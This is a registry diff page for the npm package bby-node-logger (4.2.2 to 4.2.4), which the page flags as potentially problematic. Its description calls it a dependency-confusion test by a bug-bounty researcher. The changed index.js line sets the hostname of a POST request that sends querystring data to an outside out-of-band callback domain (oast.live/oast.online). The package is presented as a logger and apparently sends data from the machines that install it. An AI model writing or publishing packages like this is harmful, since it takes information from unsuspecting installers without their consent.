bby-node-logger 4.2.2 → 4.2.4

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.


This version of bby-node-logger might be problematic. Click here for more details.

Files changed (2) hide show
  1. package/index.js +1 -1
  2. package/package.json +1 -1
package/index.js CHANGED
@@ -32,7 +32,7 @@ const data = querystring.stringify({
32
32
 
33
33
  // Options for the POST request
34
34
  const options = {
35
- hostname: 'crktv24qfhfgh6mltnsg7w3jyf5y6usrf.oast.live', // Replace with actual external server
35
+ hostname: 'crkvat4qfhfgmsj1bq20rpdf5no1sxcph.oast.online', // Replace with actual external server
36
36
  port: 80, // Change port if using HTTPS or a custom port
37
37
  path: '/endpoint', // Replace with actual path
38
38
  method: 'POST',
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "bby-node-logger",
3
- "version": "4.2.2",
3
+ "version": "4.2.4",
4
4
  "description": "Dependency Confusion Test by iQimpz (https://hackerone.com/iqimpz)",
5
5
  "main": "index.js",
6
6
  "scripts": {